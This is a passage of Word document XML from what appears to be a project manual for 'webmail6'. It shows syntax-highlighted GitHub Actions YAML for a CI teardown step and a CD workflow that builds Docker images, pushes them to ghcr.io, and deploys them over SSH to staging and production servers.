          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/test-results/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retention-days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">7</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Tear down</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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker compose down -v --remove-orphans</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="219"/>
    <w:bookmarkStart w:id="220" w:name="cd-build-docker-push-registry-deploy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.1.3 CD: Build Docker → Push Registry → Deploy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># .github/workflows/cd.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> CD - Deploy to Production</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'v*'</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">inputs</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'Entorno de despliegue'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'staging'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> choice</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ghcr.io</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAGE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ github.repository }}</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build-and-push</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ubuntu-24.04</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packages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> write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service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> web</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Docker Buildx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker/setup-buildx-action@v3</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Log in to GitHub Container Registry</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker/login-action@v3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registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ env.REGISTRY }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ github.actor }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ secrets.GITHUB_TOKEN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Extract metadata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> meta</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker/metadata-action@v5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images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}/${{ matrix.service }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            type=semver,pattern={{version}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            type=semver,pattern={{major}}.{{minor}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            type=sha,prefix={{branch}}-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            type=raw,value=latest,enable={{is_default_branch}}</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and push</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker/build-push-action@v6</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/${{ matrix.service }}/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">push</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tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ steps.meta.outputs.tags }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">labels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ steps.meta.outputs.labels }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cache-from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=gha</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cache-to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=gha,mode=max</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">platforms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> linux/amd64,linux/arm64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy-staging</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ubuntu-24.04</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build-and-push</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> github.event.inputs.environment == 'staging' || startsWith(github.ref, 'refs/tags/v')</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staging</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://staging.webmail6.local</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to staging server</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> appleboy/ssh-action@v1.0.3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 secrets.STAGING_HOST }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ secrets.STAGING_USER }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ secrets.STAGING_SSH_KEY }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            cd /opt/webmail6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker compose pull</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker compose up -d --remove-orphans</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker system prune -f</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy-production</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ubuntu-24.04</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build-and-push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> deploy-staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> github.event.inputs.environment == 'production'</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production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://webmail6.local</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to production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> appleboy/ssh-action@v1.0.3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 secrets.PROD_HOST }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ secrets.PROD_USER }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ secrets.PROD_SSH_KEY }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
